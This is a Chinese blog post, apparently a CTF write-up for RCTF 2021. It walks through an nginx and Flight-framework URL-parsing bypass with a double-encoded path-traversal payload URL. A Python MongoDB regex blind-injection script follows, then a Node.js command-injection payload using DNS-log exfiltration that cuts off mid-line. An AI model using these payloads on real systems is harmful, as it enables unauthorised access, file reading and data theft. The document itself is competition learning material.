<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","width":300,"display":"post","padding":18,"offset":12,"scrollpercent":true,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="rctf2021废话基本是躺的比赛，白天对着php源码看了半天也没看出来漏洞，然后去看密码，只要能分解出一个512bit的数就能出了，可惜分不得。再看去misc，图片那个题误以为p,q,m很大，考虑一堆不同的像素点列几万个方程z3去解，上传上去wget下来发现图片有压缩觉得不可做于是立刻放弃。ezshell那个网上抄了个冰蝎马的代码，编译出.class丢给队友，服务器直接500了，后来发现是jdk">
<meta property="og:type" content="article">
<meta property="og:title" content="rctf2021.md">
<meta property="og:url" content="http://example.com/2021/09/13/rctf2021/index.html">
<meta property="og:site_name" content="FYHSSGSS&#39;s blog">
<meta property="og:description" content="rctf2021废话基本是躺的比赛，白天对着php源码看了半天也没看出来漏洞，然后去看密码，只要能分解出一个512bit的数就能出了，可惜分不得。再看去misc，图片那个题误以为p,q,m很大，考虑一堆不同的像素点列几万个方程z3去解，上传上去wget下来发现图片有压缩觉得不可做于是立刻放弃。ezshell那个网上抄了个冰蝎马的代码，编译出.class丢给队友，服务器直接500了，后来发现是jdk">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2021/09/13/rctf2021/assets/image-20210914001902249.png">
<meta property="og:image" content="http://example.com/2021/09/13/rctf2021/assets/image-20210914001923674.png">
<meta property="og:image" content="http://example.com/2021/09/13/rctf2021/assets/image-20210914004841582.png">
<meta property="og:image" content="http://example.com/2021/09/13/rctf2021/assets/image-20210914005001611.png">
<meta property="article:published_time" content="2021-09-13T07:22:07.000Z">
<meta property="article:modified_time" content="2022-01-11T03:53:49.539Z">
<meta property="article:author" content="FYHSSGSS">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2021/09/13/rctf2021/assets/image-20210914001902249.png">

<link rel="canonical" href="http://example.com/2021/09/13/rctf2021/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>rctf2021.md | FYHSSGSS's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">FYHSSGSS's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-ctf">

    <a href="/categories/CTF" rel="section"><i class="fa fa-flag fa-fw"></i>CTF</a>

  </li>
        <li class="menu-item menu-item-acm">

    <a href="/categories/ACM" rel="section"><i class="fa fa-code fa-fw"></i>ACM</a>

  </li>
        <li class="menu-item menu-item-school">

    <a href="/categories/school" rel="section"><i class="fa fa-book fa-fw"></i>school</a>

  </li>
        <li class="menu-item menu-item-life">

    <a href="/categories/life" rel="section"><i class="fa fa-film fa-fw"></i>life</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/09/13/rctf2021/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/saiki.jpg">
      <meta itemprop="name" content="FYHSSGSS">
      <meta itemprop="description" content="Do you like what you see">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="FYHSSGSS's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          rctf2021.md
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-09-13 15:22:07" itemprop="dateCreated datePublished" datetime="2021-09-13T15:22:07+08:00">2021-09-13</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-01-11 11:53:49" itemprop="dateModified" datetime="2022-01-11T11:53:49+08:00">2022-01-11</time>
              </span>

          <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>6.5k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>6 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="rctf2021"><a href="#rctf2021" class="headerlink" title="rctf2021"></a>rctf2021</h1><h2 id="废话"><a href="#废话" class="headerlink" title="废话"></a>废话</h2><p>基本是躺的比赛，白天对着php源码看了半天也没看出来漏洞，然后去看密码，只要能分解出一个512bit的数就能出了，可惜分不得。再看去misc，图片那个题误以为p,q,m很大，考虑一堆不同的像素点列几万个方程z3去解，上传上去wget下来发现图片有压缩觉得不可做于是立刻放弃。ezshell那个网上抄了个冰蝎马的代码，编译出.class丢给队友，服务器直接500了，后来发现是jdk版本太高，就交给队友去下载新版本了。回了趟宿舍睡了个觉，早上一醒发现队友们已经把miscAK了，同时又把一个web一个pwn干出来了，最后排名是21，虽然是20名交writeup，但也真的太牛了。。很难过的反思自己为什么这么废物了一上午后决定好好去复盘一下这场比赛。</p>
<span id="more"></span>
<h2 id="easyphp"><a href="#easyphp" class="headerlink" title="easyphp"></a>easyphp</h2><p>拿到源码先审，很显然是要admin登进去，用户名是admin，但是密码我们无法获取。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="variable">$request</span>-&gt;data-&gt;username === <span class="variable">$username</span> &amp;&amp; <span class="variable">$request</span>-&gt;data-&gt;password === <span class="variable">$password</span>)&#123;</span><br><span class="line">        <span class="variable">$_SESSION</span>[<span class="string">&quot;user&quot;</span>] = <span class="variable">$username</span>;</span><br><span class="line">        <span class="variable">$app</span>-&gt;redirect(<span class="string">&quot;/&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>此处表明我们需要有user的session才能去登入admin，另外在此处也发现了一点东西：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$app</span>-&gt;route(<span class="string">&#x27;/*&#x27;</span>, <span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">global</span> <span class="variable">$app</span>;</span><br><span class="line">    <span class="variable">$request</span> = <span class="variable">$app</span>-&gt;request();</span><br><span class="line">    <span class="variable">$app</span>-&gt;render(<span class="string">&quot;head&quot;</span>,[],<span class="string">&quot;head_content&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span>(stristr(<span class="variable">$request</span>-&gt;url,<span class="string">&quot;login&quot;</span>)!==<span class="literal">FALSE</span>)&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="variable">$_SESSION</span>[<span class="string">&quot;user&quot;</span>])&#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="variable">$app</span>-&gt;redirect(<span class="string">&quot;/login&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>
<p>这个<code>return true</code>表示的意思就是可以继续这个路由的访问，可以看到，要么有<code>_session[user]</code>,要么url里包含<code>login</code>，就可以直接进到我们想去的路由中。</p>
<p>在web层面我们直接尝试访问<code>/admin</code>，却发现在服务器层被nginx403弹回来了，回去看<code>nginx.conf</code>，里面有很奇怪的点。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">root   /var/www/html;</span><br><span class="line">location /admin &#123;</span><br><span class="line">    allow 127.0.0.1;</span><br><span class="line">    deny all;</span><br><span class="line">&#125;</span><br><span class="line">location / &#123;</span><br><span class="line">    index  index.php;</span><br><span class="line">    try_files $uri @phpfpm;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>只有本地才能访问/admin???那框架上在写什么东西？？</p>
<p>第一步很明确，我们要绕过nginx对<code>/admin</code>这个路由的解析，这个绕法我在当时无聊的时候发现的一个特性，就是在之前无论输入什么，比如<code>/views/index.php</code>,<code>/views/template.php</code>，结果浏览器跳转的居然是<code>/views/login</code>,这就十分灵性，理论上应该跳回<code>/login</code>的，为了解决这个问题，我们去审这个Flight框架的路由。</p>
<p>重点看<code>/flight/net</code>部分的几个php文件，分别是解析request包，response包和route的，很灵性的就是我们之前在<code>index.php</code>看到的<code>$request-&gt;url</code>。这个<code>url</code>是怎么得到的？</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$config</span> = <span class="keyword">array</span>(</span><br><span class="line">                <span class="string">&#x27;url&#x27;</span> =&gt; str_replace(<span class="string">&#x27;@&#x27;</span>, <span class="string">&#x27;%40&#x27;</span>, <span class="built_in">self</span>::getVar(<span class="string">&#x27;REQUEST_URI&#x27;</span>, <span class="string">&#x27;/&#x27;</span>)),</span><br><span class="line">                <span class="string">&#x27;base&#x27;</span> =&gt; str_replace(<span class="keyword">array</span>(<span class="string">&#x27;\\&#x27;</span>,<span class="string">&#x27; &#x27;</span>), <span class="keyword">array</span>(<span class="string">&#x27;/&#x27;</span>,<span class="string">&#x27;%20&#x27;</span>), dirname(<span class="built_in">self</span>::getVar(<span class="string">&#x27;SCRIPT_NAME&#x27;</span>))),</span><br><span class="line">    </span><br><span class="line">    ...</span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">$this</span>-&gt;base != <span class="string">&#x27;/&#x27;</span> &amp;&amp; strlen(<span class="keyword">$this</span>-&gt;base) &gt; <span class="number">0</span> &amp;&amp; strpos(<span class="keyword">$this</span>-&gt;url, <span class="keyword">$this</span>-&gt;base) === <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;url = substr(<span class="keyword">$this</span>-&gt;url, strlen(<span class="keyword">$this</span>-&gt;base));</span><br><span class="line">        &#125;    </span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p><code>REQUEST_URI</code>是从nginx转发过来的,是原生请求URI</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">location @phpfpm &#123;</span><br><span class="line">    include        fastcgi_params;</span><br><span class="line">    fastcgi_split_path_info ^(.+?\.php)(/.*)$;</span><br><span class="line">    fastcgi_pass   php:9000;</span><br><span class="line">    fastcgi_index  index.php;</span><br><span class="line">    fastcgi_param  SCRIPT_FILENAME  $document_root/index.php;</span><br><span class="line">    fastcgi_param  REQUEST_URI  $uri;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>可以测试一下REQUEST_URI和SCRIPT_NAME都是什麽。</p>
<p><img src="/2021/09/13/rctf2021/assets/image-20210914001902249.png" alt="image-20210914001902249"></p>
<p><img src="/2021/09/13/rctf2021/assets/image-20210914001923674.png" alt="image-20210914001923674"></p>
<p>结合上述代码我们就知道了，<code>$this-&gt;url</code>会拿到之前的<code>base</code>,把<code>/</code>全部拿掉，只剩下最后一部分，才是真正的<code>request-&gt;url</code>，在<code>index.php</code>匹配里全都是这个部分，这就能解决之前说的为什么<code>views/index.php</code>会跳回<code>views/login</code>的问题。</p>
<p>所以要想绕过nginx层仅有本地访问的限制，我们只需要修改为<code>/1/admin</code>，就能绕过nginx，而框架会把我们的url解析成<code>/admin</code>，算是绕过了第一部分。</p>
<p>第二部分是这段代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(stristr(<span class="variable">$request</span>-&gt;url,<span class="string">&quot;login&quot;</span>)!==<span class="literal">FALSE</span>)&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>需要在url里有login就能成功进入/admin了,放在哪里合适呢？思来想去只有放在?充当一个变量才合适。</p>
<p>在这里我们引入nginx里对$uri的理解：<a target="_blank" rel="noopener" href="https://www.jianshu.com/p/b9705efc2792">https://www.jianshu.com/p/b9705efc2792</a></p>
<ul>
<li>进行一次url解码</li>
<li><p>去除所有查询字符串，即?及其后面的部分</p>
</li>
<li><p>将连续重复的/替换为单个/</p>
</li>
</ul>
<p>可以测试一下：</p>
<p><img src="/2021/09/13/rctf2021/assets/image-20210914004841582.png" alt="image-20210914004841582"></p>
<p>nginx直接把?后面的东西给抹除了。</p>
<p>但是如果我们把<code>？</code>url编码一下，再放上去，nginx解码之后不会理解<code>?</code>是一个标识符，而是把他理解为一个普通的路由，至此，我们传给php-fpm的url就已经是<code>admin?login</code>,这个就是<code>request-&gt;url</code>，的确包含了<code>login</code>,所以理所应当的我们进入了admin这个身份，并且能看文件了！</p>
<p><img src="/2021/09/13/rctf2021/assets/image-20210914005001611.png" alt="image-20210914005001611"><br>快速过一遍/admin的代码，发现是读当前目录下的文件，通过scandir实现的</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;h3&gt;File <span class="keyword">List</span>:&lt;/h3&gt;</span><br><span class="line">&lt;script&gt;</span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;div <span class="class"><span class="keyword">class</span>=&quot;<span class="title">bg</span>-<span class="title">light</span> <span class="title">border</span> <span class="title">rounded</span>-3&quot; <span class="title">style</span>=&quot;<span class="title">white</span>-<span class="title">space</span>: <span class="title">pre</span>-<span class="title">line</span>&quot;&gt;</span></span><br><span class="line"><span class="class">    &lt;?<span class="title">php</span></span></span><br><span class="line"><span class="class">        $<span class="title">dir</span> = <span class="title">pathinfo</span>($<span class="title">data</span>?$<span class="title">data</span>:&quot;.&quot;,<span class="title">PATHINFO_DIRNAME</span>);</span></span><br><span class="line"><span class="class">        <span class="title">foreach</span>(<span class="title">scandir</span>($<span class="title">dir</span>) <span class="title">as</span> $<span class="title">v</span>)</span>&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;&lt;a href=\&quot;/admin?data=<span class="subst">$dir</span>/<span class="subst">$v</span>\&quot;&gt;<span class="subst">$v</span>&lt;/a&gt;&lt;br /&gt;&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    <span class="meta">?&gt;</span></span><br><span class="line">&lt;/div&gt;</span><br><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">if</span> (<span class="variable">$data</span>) &#123; <span class="meta">?&gt;</span>&lt;h3&gt;<span class="meta">&lt;?=</span> <span class="variable">$data</span> . <span class="string">&quot;:&quot;</span> <span class="meta">?&gt;</span>&lt;/h3&gt;</span><br><span class="line">    &lt;div <span class="class"><span class="keyword">class</span>=&quot;<span class="title">bg</span>-<span class="title">light</span> <span class="title">border</span> <span class="title">rounded</span>-3&quot;&gt;&lt;<span class="title">code</span> <span class="title">style</span>=&quot;<span class="title">white</span>-<span class="title">space</span>: <span class="title">pre</span>-<span class="title">line</span>&quot;&gt;&lt;?<span class="title">php</span> <span class="title">echo</span> <span class="title">file_get_contents</span>($<span class="title">data</span>); ?&gt;&lt;/<span class="title">code</span>&gt;&lt;/<span class="title">div</span>&gt;&lt;?<span class="title">php</span> &#125; ?&gt;</span></span><br></pre></td></tr></table></figure>
<p>我们读flag肯定要路径穿越回去，十分不幸的是，在<code>index.php</code>中，把路径穿越符全部禁掉了。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">isdanger</span>(<span class="params"><span class="variable">$v</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(is_array(<span class="variable">$v</span>))&#123;</span><br><span class="line">        <span class="keyword">foreach</span>(<span class="variable">$v</span> <span class="keyword">as</span> <span class="variable">$k</span>=&gt;<span class="variable">$value</span>)&#123;</span><br><span class="line">            <span class="keyword">if</span>(isdanger(<span class="variable">$k</span>)||isdanger(<span class="variable">$value</span>))&#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(strpos(<span class="variable">$v</span>,<span class="string">&quot;../&quot;</span>)!==<span class="literal">false</span>)&#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>十分可惜，这个isdanger是在engine启动前，根据nginx解析get变量后进行判断的，由于我们对<code>?</code>进行了编码绕过了nginx的变量解析，所以nginx传给php-fpm的<code>$_GET</code>是空的，自然能绕过isdanger。</p>
<p>又因为这个框架对url的解析只认最后一个斜杠，如果我们正常写<code>data=../../../flag</code>的话会被框架解析为<code>/flag</code>路由，如果写<code>data=..%2f..%2f..%2fflag</code>也没用，因为被nginx解码之后回去还是会变成<code>../</code>。    </p>
<p>继续追踪<code>net/Request.php</code>，这里多此一举的再次对url进行了解析：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="keyword">empty</span>(<span class="keyword">$this</span>-&gt;url)) &#123;</span><br><span class="line">    <span class="keyword">$this</span>-&gt;url = <span class="string">&#x27;/&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// Merge URL query parameters with $_GET</span></span><br><span class="line"><span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="variable">$_GET</span> += <span class="built_in">self</span>::parseQuery(<span class="keyword">$this</span>-&gt;url);</span><br><span class="line">    <span class="keyword">$this</span>-&gt;query-&gt;setData(<span class="variable">$_GET</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>在这里，对<code>$this-&gt;url</code>再次进行了解析，之前骗过nginx的get请求此时被解析了出来，会把第二次解析的内容放入<code>$this-&gt;query-&gt;data</code>里，所以进到最后一步里，data就理所应当的被赋值进来了。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$app</span>-&gt;render(<span class="string">&quot;admin&quot;</span>,[<span class="string">&quot;data&quot;</span>=&gt;<span class="string">&quot;./&quot;</span>.<span class="variable">$request</span>-&gt;query-&gt;data],<span class="string">&quot;body_content&quot;</span>);</span><br></pre></td></tr></table></figure>
<p>至此，我们思路很清晰了，对<code>../</code>进行二次编码<code>..%252f</code>，第一次解码是在nginx层，解码为<code>..%2f</code>后传给php-fpm，这个不会被当成<code>/</code>，所以<code>$request-&gt;url</code>不变，第二次解码是在<code>request.php</code>中的<code>init</code>中，解完之后<code>$_GET[data]</code>就是<code>../</code>了，我们就能任意路径穿越去读文件了。</p>
<p>最终payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://124.71.132.232:60080/..%2f/admin%3flogin=&amp;data=..%252f..%252f..%252f..%252fflag</span><br></pre></td></tr></table></figure>
<p>事后总结一下这个题为什么能这么搞，第一点比较离谱的就是框架在解析路由的时候只认了最后一个<code>/</code>的东西，这种bug我也很是服气。剩下的就是nginx和这个框架的配合失误，他自己把很多事情（比如nginx已经给你解析好的东西）都会自己再处理一遍，才导致的这种二次编码绕过漏洞。</p>
<h2 id="candyshop"><a href="#candyshop" class="headerlink" title="candyshop"></a>candyshop</h2><p>审计源码发现是mongoDB,找到了一篇巨佬的博客<a target="_blank" rel="noopener" href="https://whoamianony.top/2021/07/30/Web%E5%AE%89%E5%85%A8/Nosql%20%E6%B3%A8%E5%85%A5%E4%BB%8E%E9%9B%B6%E5%88%B0%E4%B8%80/，里面有对于MongoDB的布尔盲注，盲注后拿到密码，登进去后发现order填写中并未进行任何过滤，所以考虑闭合右括号然后任意js代码执行，这里的执行没有回显，所以我们直接用dnslog进行数据外带即可。">https://whoamianony.top/2021/07/30/Web%E5%AE%89%E5%85%A8/Nosql%20%E6%B3%A8%E5%85%A5%E4%BB%8E%E9%9B%B6%E5%88%B0%E4%B8%80/，里面有对于MongoDB的布尔盲注，盲注后拿到密码，登进去后发现order填写中并未进行任何过滤，所以考虑闭合右括号然后任意js代码执行，这里的执行没有回显，所以我们直接用dnslog进行数据外带即可。</a></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"></span><br><span class="line">password = <span class="string">&#x27;&#x27;</span></span><br><span class="line">url = <span class="string">&quot;http://123.60.21.23:23333&quot;</span></span><br><span class="line">strlist = string.ascii_lowercase + string.digits</span><br><span class="line">s = requests.session()</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getPass</span>():</span></span><br><span class="line">    <span class="keyword">global</span> password</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="keyword">for</span> c <span class="keyword">in</span> strlist:</span><br><span class="line">            post_payload = &#123;</span><br><span class="line">                <span class="string">&quot;username&quot;</span>: <span class="string">&quot;rabbit&quot;</span>,</span><br><span class="line">                <span class="string">&quot;password[$regex]&quot;</span>: <span class="string">&#x27;^&#x27;</span> + password + c</span><br><span class="line">            &#125;</span><br><span class="line">            r = requests.post(url=url+<span class="string">&#x27;/user/login&#x27;</span>, data=post_payload)</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&#x27;You Bad Bad&#x27;</span> <span class="keyword">in</span> r.text:</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">&quot;[+] %s&quot;</span> % (password + c))</span><br><span class="line">                password += c</span><br><span class="line">                <span class="keyword">if</span> <span class="built_in">len</span>(password) == <span class="number">64</span>:</span><br><span class="line">                    <span class="keyword">break</span></span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">len</span>(password) == <span class="number">64</span>:</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">login</span>():</span></span><br><span class="line">    s.post(url + <span class="string">&#x27;/user/login&#x27;</span>, data=&#123;<span class="string">&#x27;username&#x27;</span>:<span class="string">&#x27;rabbit&#x27;</span>, <span class="string">&#x27;password&#x27;</span>:password&#125;)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">test</span>():</span></span><br><span class="line">    r = s.post(url + <span class="string">&#x27;/shop/order&#x27;</span>, data=&#123;<span class="string">&#x27;username&#x27;</span>:<span class="string">&quot;&#x27;)\n                                -[][\&quot;constructor\&quot;][\&quot;constructor\&quot;](\&quot;console.log(this.process.mainModule.require(&#x27;child_process&#x27;).exec(&#x27;ping `cat 